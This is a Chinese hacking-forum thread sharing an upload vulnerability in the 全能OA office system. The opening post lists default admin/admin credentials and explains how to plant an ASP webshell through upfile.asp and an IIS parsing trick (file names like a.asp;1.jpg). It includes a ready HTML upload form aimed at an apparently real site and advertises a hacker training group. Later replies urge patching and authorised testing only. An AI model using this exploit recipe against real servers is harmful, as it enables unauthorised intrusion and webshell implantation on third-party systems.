全能OA办公系统0day OA办公系统漏洞 上传漏洞
软件介绍:全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
主要功能:
公司通告
工作计划
通讯助理
客户资源
我的公文
公文传阅
公共资源
资源预约
今日考勤
个人计划
个人通讯录
个人基本档案
未读邮件
发邮件
收件夹
寄件夹
网络硬盘
网络会议
网络调查
交流论坛
管理用户名:admin 管理密码:admin
原码下载:http://www.mycodes.net/30/4750.htm
漏洞文件:upfile.asp 典型的动网上传漏洞不做多说
利用: 明小子提交:http://www.0855.tv/upfile.asp即可
如果upfile.asp 不存在。你可以试试下面的方法。上传a.asp;1.jpg 格式
shell在http://www.0855.tv/upfile/savepath/a.asp;1.jpg
前提是有解析漏洞。
<table border='0' align="center" cellpadding="5">
<form method="POST" action="http://www.0855.tv/oa/upfile/upfile.asp" enctype="multipart/form-data" id="form1" name="form1" onsubmit='return checkSub(this)'>
<tr>
<td>报错:</td>
<td><input type='radio' name='errnumber' value='0'>
自动更名
<input type='radio' name='errnumber' value='1' checked>
报错方式
<input type='radio' name='errnumber' value='2'>
直接覆盖</td>
</tr>
<tr>
<td>主题:</td>
<td><input type='text' name='filename' size='30'></td>
</tr>
<tr>
<td>文件:</td>
<td><input type="file" name="fruit" size="30"></td>
</tr>
<tr>
<td valign='top'>简介:</td>
<td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
</tr>
<td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
</tr>
</form>
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg此漏洞需要配合解析漏洞利用。凯里防黑网收学员:http://www.0855.tv/vip.html
顶起,感谢分享 嘿嘿 表示不理解
Re: 全能OA办公系统0day OA办公系统漏洞 上传漏洞
感谢分享这个漏洞信息。这类OA系统如果还在使用默认密码admin/admin,再加上upfile.asp的上传漏洞,确实很容易被利用。建议还在用这个系统的用户尽快修改默认管理员密码,并检查upfile.asp文件是否还有上传功能,或者直接删除不必要的上传脚本。另外,IIS解析漏洞也需要环境支持,但配合起来危害不小。总之安全无小事,提醒大家及时自查修复。Re: 全能OA办公系统0day OA办公系统漏洞 上传漏洞
感谢楼主分享这个漏洞信息,提醒大家注意全能OA办公系统2012存在上传漏洞。从描述看,upfile.asp文件未对上传类型做严格校验,配合解析漏洞可能被上传恶意脚本。建议正在使用该系统的用户尽快检查并修复此漏洞,比如对上传文件类型做白名单限制、禁用目录执行权限等,避免被攻击者利用。同时也提醒大家谨慎下载和部署来源不明的源码,生产环境一定要做好安全加固。Re: 全能OA办公系统0day OA办公系统漏洞 上传漏洞
看到楼主分享的这个全能OA办公系统的漏洞信息,确实是个比较经典的动网上传漏洞。`upfile.asp` 文件没有做好文件类型过滤,再加上 IIS 解析漏洞,攻击者很容易上传带.asp 后缀的 webshell。而且管理员默认密码还是 admin/admin,风险就更大了。 建议还在使用这套系统的用户尽快检查一下:`upfile.asp` 是否存在并做访问权限限制,升级到最新版本或者直接更换更安全的 OA 系统。如果你只是做安全研究,建议在本地或授权环境下测试,不要对在线站点直接利用。感谢楼主分享,大家务必提高安全意识。
页:
[1]